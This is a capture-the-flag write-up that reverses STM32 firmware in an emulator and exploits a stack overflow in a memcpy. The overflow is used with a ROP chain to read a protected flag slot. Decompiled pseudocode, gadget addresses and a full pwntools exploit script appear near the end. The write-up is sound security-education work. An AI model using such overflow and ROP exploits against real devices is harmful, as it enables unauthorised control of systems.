Level 9 - HWisntThatHardv2 (hardware pwn)

This challenge requires us to find a vulnerability in STM32 firmware, and exploit it to read the flag in memory. We are given an stm32 emulator to emulate the firmware since we do not have access to the physical hardware. To better understand the challenge structure, we need to look at the config file config.yaml:

cpu:
  svd: stm32f407.svd
  vector_table: 0x08000000
regions:
  - name: ROM
    start: 0x08000000
    load: csit_iot.bin
    size: 0x80000
  - name: RAM-CCM
    start: 0x10000000
    size: 0x18000
  - name: RAM
    start: 0x20000000
    size: 0x20000
framebuffers:
peripherals:
devices:
  spi_flash:
    - peripheral: SPI3
      jedec_id: 0xef4016
      file: ext-flash.bin
      size: 0x400000
  usart_probe:
    - peripheral: USART1
patches:

The firmware logic is in csit_iot.bin which is loaded at address 0x08000000, and an external SPI flash on SPI3.

If we look at ext-flash.bin we see the following:

The first 32 bytes are the real flag we're interested in, and the rest of the data are fake flags. Including the credits there are 16 entries.

Let's look at the dockerfile:

FROM ubuntu
WORKDIR /tisc

RUN apt-get update && apt-get install -y socat

COPY csit_iot.bin .
COPY ext-flash.bin .
COPY stm32-emulator .
COPY stm32f407.svd .
COPY config.yaml .

ENTRYPOINT socat tcp-l:8000,fork,reuseaddr exec:"timeout 60s ./stm32-emulator config.yaml"

The stm32 emulator is run with the provided config file. When we try to see all options the stm32 emulator has we see the following:

STM32 Emulator

USAGE:
    stm32-emulator [OPTIONS] <CONFIG>

ARGS:
    <CONFIG>    Config file

OPTIONS:
    -b, --busy-loop-stop
            Stop emulation when the program reaches a busy loop

    -c, --color <COLOR>
            Colorize output [default: auto] [possible values: auto, always, never]

    -d, --dump-stack <DUMP_STACK>
            Dump stack at the end. Parameter is the number of words to print

    -h, --help
            Print help information

    -i, --interrupt-period <INTERRUPT_PERIOD>
            Run pending interrupts every N instructions Shorter is more correct, but is slower
            [default: 1]

    -m, --max-instructions <MAX_INSTRUCTIONS>
            Maximum number of instructions to execute

    -s, --stop-addr <STOP_ADDR>
            Stop emulation when pc reaches this address

    -v, --verbose
            Verbosity. Can be repeated. -vvvv is the maximum

However, when I tried using the different options they didn't seem to actually work. I later managed to find the stm32-emulator repo on GitHub, but it had not been configured to allow the user to enter input from stdin. In other words, both provided and sourced emulators didn't work perfectly. I decided to try reversing the binary first.

Using my IDA Pro MCP + GitHub Copilot, it gave me some understanding as to how the program worked, and I learnt that there were 2 main types of input it accepted, both in json:

  1. View the 32 bytes at a certain slot from 1 to 15 inclusive. The request is of the format

{"slot":x} (reads slot x)

The response looks something like

Slot 1 contains: [84,73,83,67,123,70,65,75,69,95,70,76,65,71,95,71,79,69,83,95,72,69,82,69,125,0,0,0,0,0,0,0]
  1. Find how many matches your provided array has with the slot. The request is something like:

{"slot":1,"data":[1,2,3,...]}

And the response is something like:

Checking..
Result: 1

Where 1 is the number of similarities we have with the slot data

On reversing the binary we identify a function main at address 0x807900, which calls a function parse_command at address 0x8007260.

main then has the following pseudocode:

if ( valid_command )
{
  v13 = slot_index;
  if ( (unsigned int)(slot_index - 1) <= 0xE )// 1 <= index <= 15
  {
    memset_(rx_byte, 0, 32);
    spi_cmd[0] = 3;
    spi_cmd[1] = __rev16(32 * v13);
    gpio_write_pin(1073872896, 0x8000, 0);
    spi_tx(&g_spi, spi_cmd, 4, -1);
    spi_rx(&g_spi, rx_byte, 32, -1);
    gpio_write_pin(1073872896, 0x8000, 1);
    if ( has_user_data )
    {
      check_data_and_format_result((int)rx_byte, &v41);
      if ( v41 )
        mem_free(v41, v42 - v41);
    }
    else
    {
      memcpy_(g_outbuf, (int)"Slot ", 5);
      appended = sb_append_uint(g_outbuf, v13);
      memcpy_(appended, (int)" contains: [", 12);
      p_slot_bytes = &slot_bytes;
      while ( 1 )
      {
        v26 = (unsigned __int8)*++p_slot_bytes;
        sb_append_uint(g_outbuf, v26);
        if ( p_slot_bytes == &slot_bytes_end )
          break;
        memcpy_(g_outbuf, (int)",", 1);
      }
      v27 = memcpy_(g_outbuf, (int)"]", 1);
      v28 = (int (__fastcall *)(int, int))g_outbuf;
      v29 = *(_BYTE **)((char *)&g_outbuf[31] + *(_DWORD *)(g_outbuf[0] - 12));
      if ( !v29 )
        _throw_bad_alloc((int)v27);
      if ( v29[28] )
      {
        v5 = (unsigned __int8)v29[39];
      }
      else
      {
        sub_800B34A(v29);
        v28 = sub_8006C44;
        v34 = *(int (__fastcall **)(int, int))(*(_DWORD *)v29 + 24);
        if ( v34 != sub_8006C44 )
          v5 = v34((int)v29, 10);
      }
      v30 = uart_write_buf(g_outbuf, v5, (int)v28);
      uart_write_cstr(v30, v31);
    }
    if ( line_buf != (char *)line_sso )
      mem_free(line_buf, line_sso[0] + 1);
    goto LABEL_28;
  }
  v19 = memcpy_(g_outbuf, (int)"Out of bounds!", 14);

As you can see, it ensures that the provided index is ≥ 1 and <= 15. So we can't directly read the flag at slot 0.

If there is user data we enter a function check_data_and_format_result at 0x800023c, otherwise we enter an else block which simply prints the 32 bytes of slot data.

Now let's look at check_data_and_format_result :

int __fastcall check_data_and_format_result(int a1, _DWORD *a2)
{
  int num_matches; // r5
  _DWORD *v3; // r0
  _BYTE *v4; // r6
  _DWORD *v5; // r4
  int v6; // r1
  int v7; // r0
  int (*v9)(); // r3

  num_matches = j_comparison(a1, a2);
  memcpy_(g_outbuf, "Result: ", 8);
  v3 = (_DWORD *)sb_append_uint(g_outbuf, num_matches);
  v4 = *(_BYTE **)((char *)v3 + *(_DWORD *)(*v3 - 12) + 124);
  if ( !v4 )
    _throw_bad_alloc(v3);
  v5 = v3;
  if ( v4[28] )
  {
    v6 = (unsigned __int8)v4[39];
  }
  else
  {
    sub_800B34A(v4);
    v9 = *(int (**)())(*(_DWORD *)v4 + 24);
    v6 = 10;
    if ( v9 != sub_8006C44 )
      v6 = ((int (__fastcall *)(_BYTE *, int))v9)(v4, 10);
  }
  v7 = uart_write_buf(v5, v6);
  uart_write_cstr(v7);
  return num_matches;
}

Let's look at the comparison functions:

int __fastcall j_comparison(_DWORD *a1, _DWORD *a2)
{
  return comparison(a1, a2);
}
int __fastcall comparison(_DWORD *a1, _DWORD *a2)
{
  int similarities; // r5
  char *v4; // r0
  char *v5; // r3
  int v6; // r1
  int v7; // t1
  int v8; // t1
  int *v9; // r0
  int (__fastcall *v10)(int, int); // r2
  _BYTE *v11; // r4
  int v12; // r1
  int *v13; // r0
  int v14; // r1
  int (__fastcall *v16)(int, int); // r3
  char v17; // [sp+0h] [bp-31h] BYREF
  int v18; // [sp+1h] [bp-30h] BYREF
  char v19; // [sp+20h] [bp-11h] BYREF

  memcpy_(&v18, *a2, a2[1] - *a2);
  similarities = 0;
  v4 = (char *)a1 - 1;
  v5 = &v17;
  // count number of array similarities
  do
  {
    v7 = (unsigned __int8)*++v5;
    v6 = v7;
    v8 = (unsigned __int8)*++v4;
    if ( v6 == v8 )
      ++similarities;
  }
  while ( &v19 != v5 );
  v9 = memcpy_(g_outbuf, (int)"Checking... ", 12);
  v11 = *(_BYTE **)((char *)&g_outbuf[31] + *(_DWORD *)(g_outbuf[0] - 12));
  if ( !v11 )
    _throw_bad_alloc((int)v9);
  if ( v11[28] )
  {
    v12 = (unsigned __int8)v11[39];
  }
  else
  {
    sub_800B34A(v11);
    v10 = sub_8006C44;
    v16 = *(int (__fastcall **)(int, int))(*(_DWORD *)v11 + 24);
    v12 = 10;
    if ( v16 != sub_8006C44 )
      v12 = v16((int)v11, 10);
  }
  v13 = uart_write_buf(g_outbuf, v12, (int)v10);
  uart_write_cstr(v13, v14);
  return similarities;
}
int __fastcall memcpy_(int result, char *a2, int a3)
{
  char *v3; // r2
  int i; // r3
  char v5; // t1

  v3 = &a2[a3];
  for ( i = result - 1; a2 != v3; ++i )
  {
    v5 = *a2++;
    *(_BYTE *)(i + 1) = v5;
  }
  return result;
}

At this point I tried fuzzing the program, and the first thing I tried was to provide a data array that was longer than 32 bytes. That actually caused the program to crash, which made me suspect that providing a long array actually resulted in a segfault somewhere in the program. I then asked ChatGPT to identify potential buffer overflow vulnerabilities in the program, and I learnt that the memcpy_ call in the comparison function was vulnerable to a buffer overflow. This is because if the array has >32 bytes, memcpy_ copies more bytes into v18 in the comparison function. We can see from the pseudocode that v18 is positioned at sp+1. That is 1 byte after the stack pointer. Thus we are able to overflow into the saved pc pointer / return address of comparison, and control the program execution flow.

Let's look at the function cleanup in comparison:

LDR             R0, =g_outbuf
BL              uart_write_buf
BL              uart_write_cstr
MOV             R0, R5
ADD             SP, SP, #0x24 ; '$'
POP             {R4,R5,PC}

Although the pseudocode shows that v18 is at sp+1, I found out by trial and error that the data is actually copied to address sp. Since the function calls adds 0x24 to SP then pops r4 then r5 when closing, this means that the padding between the memcpy target and PC is 0x24 + 2 * 4 = 44 bytes (2 * 4 because there are 2 registers being popped and each it 32 bits / 4 bytes long).

Therefore after writing 44 bytes into the array, the remaining content will overwrite saved PC.

Now, to get the flag we simply need to read slot 0. Let's see the relevant part of main for reading slot data again:

v13 = slot_index;
if ( (unsigned int)(slot_index - 1) <= 0xE )// 1 <= index <= 15
{
  memset_(rx_byte, 0, 32);
  spi_cmd[0] = 3;
  spi_cmd[1] = __rev16(32 * v13);
  gpio_write_pin(1073872896, 0x8000, 0);
  spi_tx(&g_spi, spi_cmd, 4, -1);
  spi_rx(&g_spi, rx_byte, 32, -1);
  gpio_write_pin(1073872896, 0x8000, 1);
  if ( has_user_data )
  {
    check_data_and_format_result((int)rx_byte, &v41);
    if ( v41 )
      mem_free(v41, v42 - v41);
  }
  else
  {
    memcpy_(g_outbuf, (int)"Slot ", 5);
    appended = sb_append_uint(g_outbuf, v13);
    memcpy_(appended, (int)" contains: [", 12);
    ...

So our objective is to have slot_index = 0 and has_user_data = 0.

How do we achieve slot_index = 0? We can simply jump to the middle of the main function after the <= 0xE check is done, and set the value of the register containing slot_index to 0 by performing Return Oriented Programming (ROP) to set register values. Let's look at the corresponding asm:

LDR             R4, [SP,#0xA8+slot_index]
SUBS            R3, R4, #1
CMP             R3, #0xE <- comparison!
BHI.W           loc_8007C20 

if not out of bounds:
MOVS            R2, #0x20 ; ' ' <- instruction at address 0x8007b14
MOVS            R1, #0
ADD             R0, SP, #0xA8+var_40
BL              memset_
MOVS            R1, #3
LSLS            R3, R4, #5
REV16           R3, R3
STRH.W          R1, [SP,#0xA8+var_8C]
LDR             R0, =0x40020000
STRH.W          R3, [SP,#0xA8+var_8A]
MOVS            R2, #0
MOV.W           R1, #0x8000
...

So we need to execute the instruction at address 0x8007b14 with R3 = 0. We can do this by looking for a pop {R3 , , ... PC} gadget. Note that in ARMTHUMB architecture we also need to perform a | 1 operation to every instruction address we specify.

I found a pop {R3, PC} gadget at address 0x0801058e .

The next problem: How do we set has_user_data = 0? Well, has_user_data is stored in the stack of the main function at SP+0x5C, so we can actually overwrite it with our array payload.

So the final ROP chain outline will be something like:

  1. Return to 0x0801058f to pop r3 and pc

  2. Return to the middle of the main function at address 0x8007b15, and it now thinks our slot is 0 since r3 = 0.

  3. Overwrite the byte at address sp+0x5C with \x00 to set has_user_data = 0.

Below is my full exploit:

from pwn import *
import json

# Remote target runs the firmware and bridges UART over TCP
p = remote("chals.tisc25.ctf.sg", 51728)
context.log_level = 'debug'

pl = [0] * 32 # next 32 bits overwrite PC
pl += [0] * 4 # padding
# r4, r5, pc
pl += [0,0,0,0,0,0,0,0] # r4, r5
pl += [0x8f, 0x05, 0x01, 0x08] # pc (pop r3; pop pc gadget) at 0x0801058e
pl += [0, 0, 0, 0] # r3
pl += [0x15, 0x7b, 0x00, 0x08] # pc (0x8007b14, middle of main)
pl += [0] * 0x5c # padding before overwriting has_user_data
pl += [0]

data = {"slot": 1, "data": pl}
p.sendline(json.dumps(data).encode())
print(p.recvrepeat(1))
p.close() # TISC{3mul4t3d_uC_pwn3d}
# Slot 0 contains: [84,73,83,67,123,51,109,117,108,52,116,51,100,95,117,67,95,112,119,110,51,100,125,0,0,0,0,0,0,0,0,0]

Last updated